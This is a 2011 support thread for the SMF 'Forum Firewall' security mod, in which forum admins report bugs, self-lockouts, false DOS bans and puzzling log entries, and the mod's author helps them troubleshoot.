I understand why but honestly there are a things that could have been done to make Aeva and others more efficient. 

Back in the day software development was simple.  You have your text editor and a list of the ROM functions.  You would have to type many lines of code just to make a window.  :D It was fast because it was the machines language and straight forward.

Then came the language compliers and further down the road packaged GUI sub-routines to make programming easier.  These new functions were all the rage.

The primary reason was to make programming easier.  Now with a single line of code you can do what may have taken several pages.   8)

Though this may not have been the intension but the result is forced obsolesce of the older computer.  As the routines became easier they became more complex.  As complexity grew more functions were drawn into the fray.   :'(

Finally the amount of subroutine calls slowed down the computer forcing an upgrade.  So the chip companies developed faster and faster processors and your new computer is just as fast as the old computer with old software but it can run the new software.   O:)

I am not going to argue that this is progress and it is good.  But there are times when some good old fashioned old school to the point stuff comes in handy.

I like fast internet connections and enjoy the luxury of high speeds but there are many out there who do not have the blazing speed you and I have.  Sometimes we need to stop and lake a look at making it faster.

The bandwidth alone was the reason I regretfully reverted back to coppermine.  Aeva is such a Wonderful mod I made sure that it was compatible with FF.
Title: Re: Forum Firewall
Post by: butchs on January 22, 2011, 10:59:44 AM
Ok, I am working on an update so if you have more suggestions speak now or wait a few weeks.   :o
Title: Re: Forum Firewall
Post by: butchs on January 22, 2011, 11:22:34 AM
Oh no I already took care of that.
Title: Re: Forum Firewall
Post by: butchs on January 22, 2011, 04:09:43 PM
Update done

Added some suggestions by Arantor & PhobosK.
Fixed Undefined variable: result & forumfirewall_data found by busterone?
Disabled mod DB setting when uninstalling.
Title: Re: Forum Firewall
Post by: busterone on January 22, 2011, 04:24:48 PM
Quick work. Thanks.  Will test it later today.  :)


EDIT- Well, you got them.  A new one has cropped up with the upgrade   :)

Undefined variable : modSettings
File: /homepages/xx/xxxxxxxxx/htdocs/forum/Sources/Subs-ForumFirewall.php
Line: 70
Title: Re: Forum Firewall
Post by: butchs on January 23, 2011, 01:41:45 AM
Oops pulled a Snoopy.   :o  See version 1.0.3.
Title: Re: Forum Firewall
Post by: busterone on January 23, 2011, 01:49:36 AM
 ;D  will do.
Title: Re: Forum Firewall
Post by: Blade_Runner on January 23, 2011, 01:54:22 PM
I have the following errors after installing this mod. How can I fix it?
The first error is from Google. The other two is spam.

----------------------------------------
Guest
66.249.71.177   

http://modcarclub.com/forums/index.php?action=tagged;id=2050;tag=rear
8: Undefined index: referer
File: /home/xxx/public_html/modcarclub.com/forums/Sources/Subs-ForumFirewall.php
Line: 990

----------------------------------------
http://modcarclub.com/forums/index.php?action=register2
8: Undefined index: user
File: /home/xxx/public_html/modcarclub.com/forums/Sources/Register.php
Line: 289

----------------------------------------
http://modcarclub.com/forums/index.php?action=register2
8: Undefined index: user
File: /home/xxx/public_html/modcarclub.com/forums/Sources/Register.php
Line: 893


Title: Re: Forum Firewall
Post by: butchs on January 23, 2011, 02:43:48 PM
Quote from: Blade_Runner on January 23, 2011, 01:54:22 PM
I have the following errors after installing this mod. How can I fix it?
The first error is from Google. The other two is spam.

It may not be google since it was on it's was to getting blocked.  This mod does not confirm the google identify.  That job is left for BB.  Still if your robots.txt and google webmasters (http://www.google.com/support/webmasters/) are correctly set, with an acceptable hit rate or it was not a DOS attempt then the I can say you caught a bad bot pretending to be google.

EDIT:  There is a new mod called Optimus Brave (http://www.simplemachines.org/community/index.php?topic=418253.msg2921987#msg2921987) that can assist you in getting the robots to scan at the correct rate.

The mod does not use "Register.php" so those errors have nothing to do with the mod.

Not sure about the "referer" error.  For me to look at it further I will need:
Version of the mod.
Version of SMF.
The visitor log entry for that ip at the time of the errors.

Doubt that the error will cause any harm.  The mod should work fine.
Title: Re: Forum Firewall
Post by: Blade_Runner on January 23, 2011, 03:41:01 PM
Quote from: butchs on January 23, 2011, 02:43:48 PM
Quote from: Blade_Runner on January 23, 2011, 01:54:22 PM
I have the following errors after installing this mod. How can I fix it?
The first error is from Google. The other two is spam.

It may not be google since it was on it's was to getting blocked.  This mod does not confirm the google identify.  That job is left for BB.  Still if your robots.txt and google webmasters (http://www.google.com/support/webmasters/) are correctly set, with an acceptable hit rate or it was an a DOS attempt then the I can say you caught a bad bot pretending to be google.

The mod does not use "Register.php" so those errors have nothing to do with the mod.

Not sure about the "referer" error.  For me to look at it further I will need:
Version of the mod.
Version of SMF.
The visitor log entry for that ip at the time of the errors.

Doubt that the error will cause any harm.  The mod should work fine.

Using version 1.0.3 on SMF 2.0RC4


Guest
66.249.71.177   
Time of error. - Today at 02:11:12 AM
http://modcarclub.com/forums/index.php?action=tagged;id=2050;tag=rear
8: Undefined index: referer
File: /home/xxx/public_html/modcarclub.com/forums/Sources/Subs-ForumFirewall.php
Line: 990

------------------------------------------
Guest
66.249.71.177   
Time of error. - Today at 02:11:11 AM
http://modcarclub.com/forums/index.php?action=tagged;id=2050;tag=rear
8: Undefined index: referer
File: /home/xxx/public_html/modcarclub.com/forums/Sources/Subs-ForumFirewall.php
Line: 990
Title: Re: Forum Firewall
Post by: butchs on January 23, 2011, 05:31:41 PM
You showed me the error log already.  I wanted to see the visitor log for that time.

Admin/ Forum Firewall Admin/ VISITORS


EDIT:  I think I found a fix.  This one is minor.  Will save for the next revision.  Lets see if there are any more.
Title: Re: Forum Firewall
Post by: Blade_Runner on January 23, 2011, 05:42:51 PM
This looks bad. Has my forum been hacked?

-----------------------------------------
3       2011-01-23 12:11:12    /home/xxx/public_html/modcarclub.com/forums/Smileys//classic/poisonbymcc1.gif contains the following exploit: xml    FORUM INFECTED with XSS!
1       2011-01-23 12:11:11    /home/xxx/public_html/modcarclub.com/forums/avatars//comic book/armory av.gif contains the following exploit: xss    FORUM INFECTED with XSS!
2       2011-01-23 12:11:11    /home/xxx/public_html/modcarclub.com/forums/Smileys//default/poisonbymcc1.gif contains the following exploit: xml    FORUM INFECTED with XSS!
Title: Re: Forum Firewall
Post by: butchs on January 23, 2011, 05:54:30 PM
Not a big deal.  The program includes a weekly scan of the default SMF image file folders on your site.  If it finds something suspicious then it will report it in the log.  If you are unsure, I suggest that you log into cpanel and delete the files.

If they are bad the only time they can cause an issue is if the were it was done correctly and you loaded them in your browser.  So do not worry and delete them.
8)

Yea yea...  I went nuts with this program.  By the way you can run  it in your scheduled tasks panel or simply turn it off there:
Admin/Scheduled Tasks/Auto scans the avatar, smilies and default image files for xss infections.

O:)
Title: Re: Forum Firewall
Post by: ZerK on January 23, 2011, 11:15:40 PM
i just activated it and i got a lot of warnings  but the user agent is googlebot, twitterbot etc.

there is anything wrong ?

Title: Re: Forum Firewall
Post by: butchs on January 24, 2011, 03:23:16 AM
No. Just a bunch of bad bots.   Just set up your robots.txt and google as mentioned in reply 102.
Title: Re: Forum Firewall
Post by: Joazo on January 24, 2011, 03:41:35 PM
I have error 403. no can acess my forum x.x . what to do?
Title: Re: Forum Firewall
Post by: butchs on January 24, 2011, 04:20:43 PM
Sorry to hear that.  Something like this can be avoided, if you run the mod for a few days before blocking bad visitors.

All settings can be edited in the SMF_"settings" file in phpmyadmin.  Find "forumfirewall_enable" and change it from 1 to 0, refresh the browser and re-enter the admin panel and fix the settings in the mod.
Title: Re: Forum Firewall
Post by: Joazo on January 24, 2011, 05:54:07 PM
Ok thanks butchs, because of you I fixed it :). What caused the problem was the "Enable Bypass Protection".

I got some questions if you got time to answer please:
1. Where can I see the logs of the forum firewall?
2. How can I test the forum firewall is really working (please a easy & fast way)
3. I have written : "SECURITY RISK: MAGIC_QUOTES ARE ON!". what should I do?
Title: Re: Forum Firewall
Post by: butchs on January 24, 2011, 06:02:38 PM
Here you go:

1.  Admin/Forum Firewall/Visitors -  This shows the log.  Use it before turning on block.
2.  If you have data in the visitor log it is working.
3.  As your host if they can turn off magic quotes.  Do not tell them why because they can get weird.  But SMF does not require it.  Ir if you have access edit your php.ini.
8)
Title: Re: Forum Firewall
Post by: Joazo on January 24, 2011, 06:22:43 PM
I asked my host to turn off MAGIC_QUOTES. Let's see their answer.

Btw How can I clean the visitors logs?

Also do you have any more suggestions on how to protect my forum?

Title: Re: Forum Firewall
Post by: butchs on January 24, 2011, 07:16:25 PM
The log cleans it's self every week.  If you are using RC4 you can go to Scheduled Tasks/ Auto Delete Old Firewall Visitor Log Entries to adjust it.

Give it time.  You should see less visits as time progresses and you are removed from lists.
;)

Check out the 1st post for more info about protection.
Title: Re: Forum Firewall
Post by: Joazo on January 25, 2011, 12:57:34 AM
Ok thanks a lot butchs.

Btw I looked my visitors logs and found this: http://img600.imageshack.us/img600/7482/dosattack.jpg

What should I do?
Is it blocked automatic?
Is it a real dos attack?
Title: Re: Forum Firewall
Post by: butchs on January 25, 2011, 06:34:14 AM
Yes but it is more like a caputa brute force access attempt.  They are banned the duration you set in the "Longterm Ban".  Since their ip changes all the time it is a waste of time to ban them more than a day. 1 hr is good for most.
Title: Re: Forum Firewall
Post by: qtime on January 25, 2011, 12:51:07 PM
What is the advantage above using a system firewall like Security & Firewall - csf v5.15

I am using Security & Firewall - csf v5.15
mod security
ossim
snort
Title: Re: Forum Firewall
Post by: butchs on January 25, 2011, 01:24:26 PM
This does not replace any other firewall software and should only be used in conjunction with other measures.  Not sure what the advantages or disadvantages are; honestly, I do not plan to research either.

This mod is designed for SMF and hopefully will catch the issues that will otherwise cause SMF not to work if tested outside of SMF.
Title: Re: Forum Firewall
Post by: qtime on January 25, 2011, 01:27:19 PM
ok thanks for fast reply, I like to advice the use of Security & Firewall - csf v5.15, it's easy to configure using webmin for example, and it's blocking a lot of bad guys or maybe the girls as well.
Title: Re: Forum Firewall
Post by: butchs on January 25, 2011, 01:33:29 PM
Excellent!  I forgot, my host uses CSF Firewall (http://www.configserver.com/index.html) as a front end to the ForumFirewall mod.  it does do a great job. and reduces the work required by FF.  They swear by it.
:)
Title: Re: Forum Firewall
Post by: THE BRA1N on January 25, 2011, 02:54:47 PM
A couple of members have gotten autobanned by the DOS protection (they weren't trying to DOS). How can I adjust the settings to make it less sensitive than the default? In other words, how do i make it so that a higher threshold must be met before the DOS attack ban kicks in?

Edit - btw, both members had the Forum Firewall Whitelist Group permission enabled and they still were banned.
Title: Re: Forum Firewall
Post by: butchs on January 25, 2011, 03:03:55 PM
What version of SMF?  Were they banned when not logged in?

You can whitelist the members group. In RC4 got to:  "Admin/Members/Manage Permissions: Forum Firewall Whitelist Group" to do so.

Or
Adjust the "Trigger" by increasing it.  Less likely, the "Cache Duration" made some tuning.  Click on the help icons "?" in the mod for instructions.

Or
Shorten or set the "Longterm Ban"to "Never" until you figure out what is going on.
Title: Re: Forum Firewall
Post by: JoeB on January 25, 2011, 06:41:19 PM
Great mod
Installed fine on SMF 2.0 RC4

How to fix this?
SECURITY RISK: MAGIC_QUOTES ARE ON!
Title: Re: Forum Firewall
Post by: butchs on January 25, 2011, 06:45:53 PM
Quote from: JoeB on January 25, 2011, 06:41:19 PM
How to fix this?
SECURITY RISK: MAGIC_QUOTES ARE ON!

See post # 112 in this thread. ;)
Title: Re: Forum Firewall
Post by: busterone on January 25, 2011, 09:03:25 PM
I just discovered that the firewall logs will not delete. I went to scheduled tasks and attempted it twice. Both times, the message was task completed, but when I looked at the log, all entries were still there.  I thought it might be something on my site since it was upgraded several times, so I tried it on my test forum, and got same result. Both are RC4. The test forum is a clean install with just Firewall mod, Stop Spammer and httpBL installed., no members, just me.  :)

No biggie, I just truncated the table in database for my main site to get same result.  I just posted it in the event anyone else has same issue. I am still unsure if it is just my forums or the mod. 
Title: Re: Forum Firewall
Post by: Joazo on January 26, 2011, 02:49:08 AM
Btw,
You wrote that there are 6 things you need:
1. Proxy Firewall.
2. Htaccess protection such as blocking nasty ip addresses, CrawlProtect and GeoIP.
3. Forum Firewall (this mod).
4. Bad Behavior mod.
5. Project Honeypot.
6. Stop Spammer.

How do I get Proxy Firewall, is this a mod?
How do I get Htaccess protection such as blocking nasty ip addresses, CrawlProtect and GeoIP?
How do I get Project Honeypot?
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 06:55:44 AM
Quote from: busterone on January 25, 2011, 09:03:25 PM
I just discovered that the firewall logs will not delete. I went to scheduled tasks and attempted it twice. Both times, the message was task completed, but when I looked at the log, all entries were still there.  I thought it might be something on my site since it was upgraded several times, so I tried it on my test forum, and got same result. Both are RC4. The test forum is a clean install with just Firewall mod, Stop Spammer and httpBL installed., no members, just me.  :)

Yes the auto purge deletes log entries greater than 7 days old.  Maybe I will add a purge button in a future version.


EDIT:  You can always uninstall the mod and check the database items then reinstall for a complete purge?
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 07:01:34 AM
Quote from: Joazo on January 26, 2011, 02:49:08 AM
1) How do I get Proxy Firewall, is this a mod?
2) How do I get Htaccess protection such as blocking nasty ip addresses, CrawlProtect and GeoIP?
3) How do I get Project Honeypot?

1)  See reply 129 in this thread.  Your host may have it installed already.
2)  Search this site I posted a how to a while back on CrawlProtect.  GeoIP may be installed by your host.
3)  That is a mod called httpbl in the mod section.  As are the others.
:D
Title: Re: Forum Firewall
Post by: JoeB on January 26, 2011, 07:53:53 AM
As an admin, Now I can not log in the forum :

HTTP Error 403 Forbidden You don't have permission to access
/forums/index.php?action=login on this server.
Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Invalid ip!
If you get this message in error, please contact the ADM1N and provide the date and time of this message.


Please advice. Only can use FTP to change any file

I stopped two commands by downloding index.php by ftp

//      'forumfirewall' => array('ForumFirewall.php', 'forumfirewall'),

   // start ForumFirewall
//   if (isset($modSettings['forumfirewall_enable']) && !empty($modSettings['forumfirewall_enable']) && $modSettings['forumfirewall_enable']) {
//      require_once($sourcedir . '/ForumFirewall.php'); }
   // end ForumFirewall
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 08:40:04 AM
You should not turn on banned until you are sure that you are not going to ban yourself.

I will send you a pm.

Title: Re: Forum Firewall
Post by: JoeB on January 26, 2011, 08:53:17 AM
Quote from: butchs on January 26, 2011, 08:40:04 AM
You should not turn on banned until you are sure that you are not going to ban yourself.

I will send you a pm.


Thank you butches for rapid reply
I am confused...what ban?
Can you tell me exactley which one od those?
General Settings
--------------------------------------------------------------------------------
Enable Testing
Block Violations
Logging
Cache Duration
Notify Administrator
--------------------------------------------------------------------------------
DOS Attacks
--------------------------------------------------------------------------------
User-Agent Inspection.
DOS Attack
User-Agent Whitelist
Trigger (#/sec)
Longterm Ban
--------------------------------------------------------------------------------
IP Address
--------------------------------------------------------------------------------
Enable IP Validation
Enable Admin IP Confirmation
Admin IP Low
Admin IP High
Admin Domain Name
--------------------------------------------------------------------------------
Ports
--------------------------------------------------------------------------------
Enable Remote Port Validation
Enable Server Port Validation
Server Port List
--------------------------------------------------------------------------------
SQL Injection
--------------------------------------------------------------------------------
Enable Injection Test
Permitted URI Characters
--------------------------------------------------------------------------------
Cross-Site Scripting
--------------------------------------------------------------------------------
Enable XSS Inspection
XSS Events alert
--------------------------------------------------------------------------------
HTTP Header Attacks
--------------------------------------------------------------------------------
Enable Header Inspection
Referrer Attacks
User-Agent Attacks
Request Entity Attacks
Country Identification
--------------------------------------------------------------------------------
Enable Country Test
GeoIP
Country Code via Headers
Country
--------------------------------------------------------------------------------
Proxy Information
--------------------------------------------------------------------------------
Visitor IP call to ProxyProxy Header IDEnable Bypass ProtectionDomain NameIP Address
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 09:01:51 AM
You are lucky I am home sick.  Going back to work tomorrow.  :o

Turn off "Block Violations" for now.  Then fix the php files.

You probably blocked yourself with the "Enable Admin IP Confirmation".  The log will give you more details.  Read the help icons "?" for details on how to adjust.
Title: Re: Forum Firewall
Post by: henrik1782 on January 26, 2011, 05:10:44 PM
Hi...

This is not really a problem with Forum Firewall but...

I just updated from 1.02 to 1.04 and once more when updating or removing a mod I had to manually make changes. For me it seem that installation of mod is based more or less on search/replace and if another mod get in between your have to make manual install/uninstall. It is normally not a big issue I just wonder that there could have been implemented a better way to do this.

This is just a comment for my fustration... Forum Firewall i working just fine. Great work.
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 05:41:13 PM
The upgrade is worth it just for the obfuscation.  He he...  O:)

I think I am done for a while updating anyway...
Title: Re: Forum Firewall
Post by: henrik1782 on January 26, 2011, 06:11:55 PM
Hi Butch and Arantor...

I know that it is not a special issue for Forum Firewall and honestly I dont mind updating. It would just have been so much easier if SMF had implemented this in another way. There are tons of other way to do it and it just seems a litle bit cloomsy.

Ok ... this is just another topic... it was just my fustration  ;)
Title: Re: Forum Firewall
Post by: butchs on January 26, 2011, 07:40:58 PM
Quote from: snoopy_virtual on January 21, 2011, 08:46:45 PM
One thing is to translate and other thing is to test.  ;)

We you did look at it and provide me a list of 1.1.x comments.  Like I did for you...  If you like I will can change you to reviewer or something like that?
???
Title: Re: Forum Firewall
Post by: Dippster on January 27, 2011, 01:43:55 AM
I was excited by this mod, it failed on test for index.template.php in default theme and ManagePermissions.php, but was OK with my theme by crip. I backed up the two pages and allowed the mod to install. once this was done I was redirected to the setup page and when ever i try to save I get a 406 error, even if i do nothing, and just try to save I get this error. I am using version 2.0 RC4.

Any help would be appreciated as I dearly would love to get this mod functioning on my forums.
Dippy
Title: Re: Forum Firewall
Post by: henrik1782 on January 27, 2011, 09:56:24 AM
Hi Butchs....

just been excluded from my own forum. Acused of a DOS attack. How do I gain access again.
Title: Re: Forum Firewall
Post by: Masterd on January 27, 2011, 01:12:27 PM
Will this mod work with Simple SEF?
Title: Re: Forum Firewall
Post by: Joazo on January 27, 2011, 02:29:53 PM
Quote from: henrik1782 on January 27, 2011, 09:56:24 AM
Hi Butchs....

just been excluded from my own forum. Acused of a DOS attack. How do I gain access again.

All settings can be edited in the SMF_"settings" file in phpmyadmin.  Find "forumfirewall_enable" and change it from 1 to 0, refresh the browser and re-enter the admin panel and fix the settings in the mod.
Title: Re: Forum Firewall
Post by: henrik1782 on January 27, 2011, 03:07:38 PM
Thanks Joazo..
Title: Re: Forum Firewall
Post by: Joazo on January 27, 2011, 05:42:55 PM
About ports:
Port 80 is enough in the allowed ports list or need anything more?
Title: Re: Forum Firewall
Post by: butchs on January 27, 2011, 07:03:36 PM
Quote from: Dippster on January 27, 2011, 01:43:55 AM
I was excited by this mod, it failed on test for index.template.php in default theme and ManagePermissions.php, but was OK with my theme by crip. I backed up the two pages and allowed the mod to install. once this was done I was redirected to the setup page and when ever i try to save I get a 406 error, even if i do nothing, and just try to save I get this error. I am using version 2.0 RC4.

Any help would be appreciated as I dearly would love to get this mod functioning on my forums.
Dippy

I really do not what to tell you.  You installed an unknown custom theme and tried to install the mod even after getting errors.  Not a good idea.  The mod is designed for the default theme and when using a custom there you need to perform a manual installation of the mod.  First install it in your default theme, then edit the parts of the custom theme that apply. :'(
Title: Re: Forum Firewall
Post by: butchs on January 27, 2011, 07:05:11 PM
Quote from: Joazo on January 27, 2011, 05:42:55 PM
About ports:
Port 80 is enough in the allowed ports list or need anything more?

In most cases port 80 is all you need for SMF. :)
Title: Re: Forum Firewall
Post by: butchs on January 27, 2011, 07:11:57 PM
Quote from: Masterd on January 27, 2011, 01:12:27 PM
Will this mod work with Simple SEF?

Out of the box, I have no idea.  The best part about this mod is that is is totally Admin configurable.  So I believe FF can be adjusted to work by editing the settings.
:-X
Title: Re: Forum Firewall
Post by: Masterd on January 28, 2011, 04:38:01 AM
Thank you, anyway. I will try this out.
Title: Re: Forum Firewall
Post by: henrik1782 on January 28, 2011, 07:23:54 PM
Hi Butchs

I have about one user every day which is blacklistet because of DOS attack. Se attachment

Can you advice to lower the DOS attack trigger from 0.65 to maybe 0.5.

Best regards
Henrik Poulsen
Title: Re: Forum Firewall
Post by: butchs on January 28, 2011, 07:38:19 PM
Lowering it will cause it to be more restrictive.  Raising the attack trigger will make it less restrictive.

If you read the built in help the trigger is the hits per second over the cache duration. So if you take the cache duration and multiply it by the trigger that will give you the total hits over the cache duration.

I really do not think raising it is a good idea.  Why not whitelist your top members instead?

I find it hard to believe that regular members are getting banned because they have to click a whole bunch of times to access the trigger.  Maybe there is another mod over using the "actionArray" causing the bans.

For example if you read post #69 in this thread the enotify mod was causing users to get banned.  The problem was reduced when the refresh rate was changed from 10000 to 30000.  Maybe it needs to be higher?
Title: Re: Forum Firewall
Post by: Dippster on January 29, 2011, 02:16:25 AM
Quote from: butchs on January 27, 2011, 07:03:36 PM
Quote from: Dippster on January 27, 2011, 01:43:55 AM
I was excited by this mod, it failed on test for index.template.php in default theme and ManagePermissions.php, but was OK with my theme by crip. I backed up the two pages and allowed the mod to install. once this was done I was redirected to the setup page and when ever i try to save I get a 406 error, even if i do nothing, and just try to save I get this error. I am using version 2.0 RC4.

Any help would be appreciated as I dearly would love to get this mod functioning on my forums.
Dippy


I really do not what to tell you.  You installed an unknown custom theme and tried to install the mod even after getting errors.  Not a good idea.  The mod is designed for the default theme and when using a custom there you need to perform a manual installation of the mod.  First install it in your default theme, then edit the parts of the custom theme that apply. :'(

Barbones forum, no other mods, no other themes complete install from scratch, bad behaviour works fine but still get 406 error when I click the save button in Forum Firewall settings. any ideas?

Title: Re: Forum Firewall
Post by: butchs on January 29, 2011, 09:47:03 AM
Do you have any thing in the SMF Error log?  If not, my guess it is on your server side and has nothing to do with the mod.

It could be the security settings by your host (ie using Modsecurity in Apache).  Or it could be a hosts firewall is blocking the content; if so, you will need to edit the mod settings in phpmyadmin.
Title: Re: Forum Firewall
Post by: quiz_modder on January 29, 2011, 10:35:54 AM
I have a few "Invalid ip" entries in the log for the following "ip address" - could you explain what is going on here? Thanks


Looking at the corresponding headers some of them look to be mobile devices. Does that mean this cannot handle them?

GET /forum/index.php?topic=536.10;wap2 HTTP/1.0 BlackBerry8520/5.0.0.681 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/142

GET /forum/index.php?action=pm HTTP/1.1 Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-S8500/S8500XXJEE; U; Bada/1.0; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/2.0 Mobile WVGA SMM-MMS/1.2.0 OPN-B

GET /forum/index.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)

GET /forum/index.php?action=forum HTTP/1.1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Title: Re: Forum Firewall
Post by: butchs on January 29, 2011, 02:16:29 PM
Good grief.  You see bad IP addresses in your log and your first thought is that there is something wrong with the Mod?   :-X

Allow me to clarify those are not real ip addresses.  What you see is the result of badly written bots trying to spoof a ip address.  The bots are so poorly written that they are putting the wrong stuff in the wrong header location.  For example you will normally see "Keep-Alive" in the connections field of the HTTP header not the ip address.

If you want to learn more about it I suggest you study HTTP headers.  I am sorry but, I have no intension to explain what the mod is doing in detail because doing so will cause more harm than good.

All I can say is that the answer to your question is NO.  The mod can handle all known ip addresses including ipv6 (non admin).  So your forum is safe.
:o
Title: Re: Forum Firewall
Post by: quiz_modder on January 29, 2011, 06:24:20 PM
Quote from: butchs on January 29, 2011, 02:16:29 PM
Good grief.  You see bad IP addresses in your log and your first thought is that there is something wrong with the Mod?   :-X

Allow me to clarify those are not real ip addresses.  What you see is the result of badly written bots trying to spoof a ip address.  The bots are so poorly written that they are putting the wrong stuff in the wrong header location.  For example you will normally see "Keep-Alive" in the connections field of the HTTP header not the ip address.

If you want to learn more about it I suggest you study HTTP headers.  I am sorry but, I have no intension to explain what the mod is doing in detail because doing so will cause more harm than good.

All I can say is that the answer to your question is NO.  The mod can handle all known ip addresses including ipv6 (non admin).  So your forum is safe.
:o

I was only asking!  :D

And I have over 30 pages of stuff already  :(
Title: Re: Forum Firewall
Post by: butchs on January 29, 2011, 06:29:41 PM
Not that bad.  I had over 2,000 my first week.  I went nuts testing and retesting...   :o
Title: Re: Forum Firewall
Post by: quiz_modder on January 30, 2011, 05:49:41 AM
Apologies, another question if you don't mind. I have an arcade script on the site which is bringing up the following

Request Entity Attack: Repeated!

GET /forum/index.php?action=arcade;sa=play;game=92 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 3.0.30729)

GET /forum/index.php?action=arcade;sa=highscore;game=92 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 3.0.30729)

Is there a way I can ignore these ones in the settings?

Thanks again.

Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 08:16:26 AM
If blocking is turned on they were blocked otherwise they are logged. 

A Request Entity Attack is nothing to sneeze at.  It can do bad things.   :'(

Repeated means that they caused an infraction and returned during the cache period.  I can not tell you if that was a problem or not since you need to give me the "result" from the first offense.   ???

It could be the game or the user.  The game could have nasty stuff inside it or the user could be trying to cause harm.  I would keep an eye on that game if I were you.
8)
Title: Re: Forum Firewall
Post by: quiz_modder on January 30, 2011, 10:59:17 AM
Yes, I only have logging on at the moment until I understand the implications a little more. So when you say I didn't give the initial results, do you mean this one?

POSTchooseGameEndProcedure: [type Function] g_fSetGameSize: [type Function] t_fLoadGameEnd: [type Function] displayMsg: [type Function] createHelp: [type Function] showHelp: [type Function] presentHelp: [type Function] createKeyboardCommand: [type Function] smoothKeyMovement: [type Function] pressKey: [type Function] generateChangeKeyControls: [type Function] saveAndLoad: [type Function] createSound: [type Function] g_fSetSoundOn: [type Function] g_fSetSoundOff: [type Function] g_fSetMusicOn: [type Function] g_fSetMusicOff: [type Function] runTimer: [type Function] trc: [type Function] g_fGetRandomValue: [type Function] TEAEncrypt: [type Function] TEADecrypt: [type Function] charsToLongs: [type Function] longsToChars: [type Function] charsToHex: [type Function] hexToChars: [type Function] charsToStr: [type Function] strToChars: [type Function] decryptParams: [type Function] tabEnabled: false tabChildren: false startX: 0 startY: 0 gameWidth: 618 gameHeight: 498 frameRate: 30 timer: 0 timeWarningAt: 5 crypto: 0 blnStartGame: false blnGameOver: false blnGameOn: true userVars: [object Object] myVariables: onLoad=%5Btype%20Function%5D puzzle_XML: xmlGameEnd: playAgain: [type Function] helpMessageNames: msgToPresent: blnWaitForKey: false keyboardCommands: smoothKeyboardCommands: waitingCommandName: numSounds: 16 soundOnBln: true musicOnBln: true g_sndGlobalSound: [object Object] soundsArray: [object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object] globalMusic: [object Object] globalSound: [object Object] clockSound: [object Object] g_A: 3423313 g_C: 2435 g_numRandomSeed: 983 globSnd: [object Object] blnFirstGame: false DBorder: [object Object] afterHit: [object Object] airBorder: [object Object] boardFall: [object Object] border: [object Object] rollSnd: [object Object] rollStart: [object Object] digBeepSound: [object Object] hitBallSound: [object Object] alarmSnd: [object Object] clickSound: [object Object] rolloverSound: [object Object] ambientLoop: [object Object] hitSound: [object Object] pulseSound: [object Object] gameoverSound: [object Object] createNewUser: [type Function] saveUserData: [type Function] loadUserData: [type Function] highestPoints: NaN newBall: [type Function] boardInit: [type Function] sqr: [type Function] roundInit: [type Function] tre: [type Function] msgX: 0 msgY: 0 g_numGameWidth: 618 g_numGameHeight: 498 bonusScores: 600 scores: 290 ballsLeft: 0 numBallsTotal: 9 ball******: 9 blnPause: false PI: 3.14159265358979 leftBorder: 109 rightBorder: 509 center: 309 trampY: 272 borderTop: 227 leftBoard: 239 rightBoard: 379 borderAngle: 1.04879579594295 borderProect: 0.501145532644875 bATang: 1.73846153846154 reflectRatio: 0.8 borderTopLeft: 226 borderTopRight: 392 leftGutter: 118 rightGutter: 252 holeRad: 30 holeRadExt: 15.5 holeRadExt2: 240.25 holeHeight: 21 leftHoleX: 249.5 rightHoleX: 368.5 topHoleY: 219.303816078334 midHoleY: 189.037409802142 bottomHoleY: 154.030482061005 circleY: 153.165133789588 circleYT: 136.016500494211 arcY: 136.016500494211 circleRad: 51 circleRad_2: 2601 arcRad: 83 arcRad_2: 6889 borderGapY: 67.4612670011503 circleGapY: 113.04320416409 ballPreviewY: 439 arrXHoles: 249.5,309,368.5,309,309 arrYHoles: 219.303816078334,219.303816078334,219.303816078334,189.037409802142,154.030482061005 arrNameHoles: ,,,,,, arrBackHoleDepths: 100,200,300,800,1000 arrFrontHoleDepths: 400,500,600,900,1100 viewHeight: 270 viewHeight_2: 72900 viewHeightDist: 646.520067800189 ballR: 10 ballR_2: 100 ballDepth: 1150 moveAngle: 1.59627926333118 viewDistStart: 287.923600977759 viewDist: 287.923600977759 dY: -56.5337004649263 dY1: -12.7142010670194 dX: -1.19799857743301 dX1: -0.531746161413689 numCalc: 1 viewCos: 0.505159772372779 distRatio: 0.343721920989708 minDistRatio: 0.28 lastCursorPosX: null lastCursorPosY: null curVelX: -7 curVelY: -113 speedRatio: 8 minVel: -32 maxVel: -70 maxSpeed: 4.4 blnSpeedRestrict: true x1: 309.009650216116 y1: 208.89958476837 z1: -71.0496245921465 vX: -0.00131217667864941 vY: -0.318780813782276 vZ: -3.83373178370822 beta: 0.815398163397448 mg: 0.54 alpha: 0.523598775598299 sinAlpha: 0.5 sinBeta: 0.727998628597419 tanBeta: 1.06187480778988 dRend: 5.27998628597419 circleH: 55.8612086435654 h: 1.0831563982682 hX: 309 hY: 219.303816078334 hObj: holeVel: 5.05329969019498 holeAccel: 1.01 blnToHole: true dPreDepth: 26.2668427778292 strState: wait blnAllowThr: true blnRoll: true maxBlinks: 4 blnRules: false blnCircles: false borderCollision: 0 maxAngle: 0.6 blnRolled: false rollIntervalId: null blnRollInterval: false 